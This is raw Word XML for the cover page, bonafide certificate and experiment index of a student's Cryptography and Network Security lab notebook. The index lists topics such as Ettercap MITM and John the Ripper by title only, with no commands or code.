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CB7AE4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40"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RAJALAKSHMI ENGINEERING COLLEGE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43364F53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32"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RAJALAKSHMI NAGAR, THANDALAM – 602 105</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158DFC78" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="007D5C22" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="031B4EDB" w14:textId="65B180D9" w:rsidR="00EF7625" w:rsidRPr="007D5C22" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:r w:rsidRPr="007D5C22"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7F5C4FDC" wp14:editId="7A5BDEC4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>944880</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2834640" cy="807720"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="114300" distR="114300"/>
            <wp:docPr id="12505839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CD112" w14:textId="59492230" w:rsidR="00EF7625" w:rsidRPr="007D5C22" w:rsidRDefault="00EF7625" w:rsidP="00EF7625"/>
    <w:p w14:paraId="05DD6B26" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="007D5C22" w:rsidRDefault="00EF7625" w:rsidP="00EF7625"/>
    <w:p w14:paraId="1A643F7D" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="007D5C22" w:rsidRDefault="00EF7625" w:rsidP="00EF7625"/>
    <w:p w14:paraId="12E4581C" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="007D5C22" w:rsidRDefault="00EF7625" w:rsidP="00EF7625"/>
    <w:p w14:paraId="5D14D867" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="007D5C22" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03BEC409" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="007D5C22" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05B351A7" w14:textId="20360149" w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5352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DEPARTMENT OF INFORMATION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66"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EF7625" w14:paraId="5D50C43B" w14:textId="77777777" w:rsidTr="00902553">
        <w:trPr>
          <w:trHeight w:val="850"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8566" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B502964" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="00C06084" w:rsidRDefault="00EF7625" w:rsidP="00902553">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C06084">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CS23632 Cryptography and Network Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF7625" w14:paraId="4FC34D68" w14:textId="77777777" w:rsidTr="00902553">
        <w:trPr>
          <w:trHeight w:val="850"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8566" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E8502A4" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00902553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Laboratory Record Note Book</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="466"/>
        <w:tblW w:w="924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1"/>
        <w:gridCol w:w="5069"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EF7625" w14:paraId="6E1B75EE" w14:textId="77777777" w:rsidTr="00EF7625">
        <w:trPr>
          <w:trHeight w:val="530"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4171" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0863F540" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
            <w:pPr>
              <w:spacing w:before="240"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Name :</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5069" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DC4486D" w14:textId="69655C9F" w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidRDefault="00CA22D0" w:rsidP="00EF7625">
            <w:pPr>
              <w:spacing w:before="240"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SAMEEHA A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF7625" w14:paraId="4538A6F7" w14:textId="77777777" w:rsidTr="00EF7625">
        <w:trPr>
          <w:trHeight w:val="524"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4171" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E8820E0" w14:textId="56D1CCBF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EF7625">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>Year / Branch / Section :</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5069" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3761FD21" w14:textId="1AC0BCAA" w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidRDefault="00CA22D0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III / </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>Btech</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Information Technology</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF7625" w14:paraId="16246E3B" w14:textId="77777777" w:rsidTr="00EF7625">
        <w:trPr>
          <w:trHeight w:val="632"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4171" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="296A329D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University Register No. :</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5069" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A24858D" w14:textId="6C438B65" w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidRDefault="00CA22D0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2116231001176</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF7625" w14:paraId="716E145F" w14:textId="77777777" w:rsidTr="00EF7625">
        <w:trPr>
          <w:trHeight w:val="614"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4171" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EA59884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College Roll No. :</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5069" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01D8B395" w14:textId="76D9D586" w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidRDefault="00CA22D0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231001176</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF7625" w14:paraId="57E43489" w14:textId="77777777" w:rsidTr="00EF7625">
        <w:trPr>
          <w:trHeight w:val="443"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4171" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27107807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Semester :</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5069" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DD96428" w14:textId="46C2CC64" w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidRDefault="00CA22D0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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF7625" w14:paraId="3E17778F" w14:textId="77777777" w:rsidTr="00EF7625">
        <w:trPr>
          <w:trHeight w:val="524"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4171" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68C05C16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Academic Year :</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5069" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36999C8C" w14:textId="6AB4498C" w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidRDefault="00CA22D0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2025 – 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="127D6421" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="008E3273" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="75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163B1C8E" w14:textId="1F1F371C" w:rsidR="00EF7625" w:rsidRDefault="00EF762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4FECD19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noProof/>
          <w:color w:val="FFFFFF" w:themeColor="background1"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10594C0" wp14:editId="2E28716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476250" cy="588645"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="927701950" name="Picture 92770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625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">RAJALAKSHMI ENGINEERING COLLEGE </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0EEAE2" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="007D5C22" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36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An Autonomous Institution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D55BFC9" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="007D5C22" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DAB5A23" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71ADBB91" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="00FD09D0" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD09D0">
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD09D0">
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>BONAFIDE CERTIFICATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD09D0">
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31019520" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="007D5C22" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C2B263" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="006D44DC" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C42378F" w14:textId="0E130DD7" w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00EF7625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EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Name: …………</w:t>
      </w:r>
      <w:r w:rsidR="00CA22D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>SAMEEHA A</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>………………………</w:t>
      </w:r>
      <w:r w:rsidR="00CA22D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>…………………..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621D5D8A" w14:textId="77777777" w:rsidR="00CA22D0" w:rsidRDefault="00EF7625" w:rsidP="00EF7625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EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Academic Year: </w:t>
      </w:r>
      <w:r w:rsidR="00CA22D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>..2025-2026</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>…… Semester: ……</w:t>
      </w:r>
      <w:r w:rsidR="00CA22D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>VI</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">……… </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735A609B" w14:textId="6AD1D8F0" w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00EF7625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EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Branch: …</w:t>
      </w:r>
      <w:r w:rsidR="00CA22D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Information Technology</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>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EF7625" w14:paraId="40410A52" w14:textId="77777777" w:rsidTr="00902553"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391D95" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00902553">
            <w:pPr>
              <w:spacing w:line="600" w:lineRule="auto"/>
              <w:jc w:val="right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 xml:space="preserve">Register No.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BFF6" w14:textId="0B10F32D" w:rsidR="00EF7625" w:rsidRDefault="00CA22D0" w:rsidP="00902553">
            <w:pPr>
              <w:spacing w:line="600" w:lineRule="auto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>2116231001176</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A35D058" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:spacing w:line="600" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D8690AB" w14:textId="70C95676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  <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Certified that this is the Bonafide record of work done by the above student in the…</w:t>
      </w:r>
      <w:r w:rsidR="00CA22D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Cryptography and network security </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>………………………………………………………………… Laboratory during the academic year 2026 – 2027.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E68BBA6" w14:textId="77777777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</w:p>
    <w:p w14:paraId="22F3ACBE" w14:textId="77777777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jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Signature of Faculty in-charge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7936BBE7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386AD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24E27B22" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Submitted for the Practical Examination held on …………………</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9A8A7D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6BFADAA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275F47B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230BC1F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22ADB5E7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7D2811B6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53C7186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7ADBE5A3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  <w:sectPr w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidSect="00EF7625">
          <w:footerReference w:type="default" r:id="rId10"/>
          <w:pgSz w:w="11907" w:h="16839"/>
          <w:pgMar w:top="1276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  <w:r w:rsidRPr="00EF7625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Internal Examiner                                                     External Examiner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0953A3" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="00EF7625" w:rsidRDefault="00EF7625" w:rsidP="00EF7625">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="134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7625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520"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="995"/>
        <w:gridCol w:w="4448"/>
        <w:gridCol w:w="1558"/>
        <w:gridCol w:w="1844"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EF7625" w:rsidRPr="00F45390" w14:paraId="346462B3" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72DA4AD6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48" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B75DD8B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EXPERIMENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33C0E341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44" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09DB1294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GITHUB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF7625" w:rsidRPr="00F45390" w14:paraId="01AEFA13" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A2B49F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448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39C05F0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Installation and Configuration of Kali Linux/Parrot OS in a VMware/VirtualBox.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="240A0CB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restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3095E640" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRPr="00F45390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74027AFF" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30BC4FB2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448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="434A1A43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Encryption Crypto 101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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CDE4878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68EEC0D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54DD2474" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E35856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448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="064B37CE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Man-in-the-middle (MITM) attacks using the Ettercap tool.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EA89196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3E5E05C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4D1EA453" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42CC59DF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448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34A090C9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Demonstrate hash cracking using John the Ripper tool.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EDF4185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25E13E45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7BCD8FD" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B92D407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4448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ADCDC2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various configurations of Iptables Firewall in Linux.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45F65BD8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172E5699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1DDC4E9F" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52DD3E98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4448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CB74183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Snort IDS/IPS to detect and prevent real time threats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Platform.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D58EE77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07C14E0F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044B614F" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27C0F3F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4448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="305B37A6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Perform Code Injection on Application Process using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Ptrace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558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36729FA4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6663233A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102F7762" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5AE0C32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4448" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BAAA200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Privilege Escalation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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C15D21C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C2A5C9B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488EC21" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="995" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0803B29D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4448" w:type="dxa"/>
          </w:tcPr>
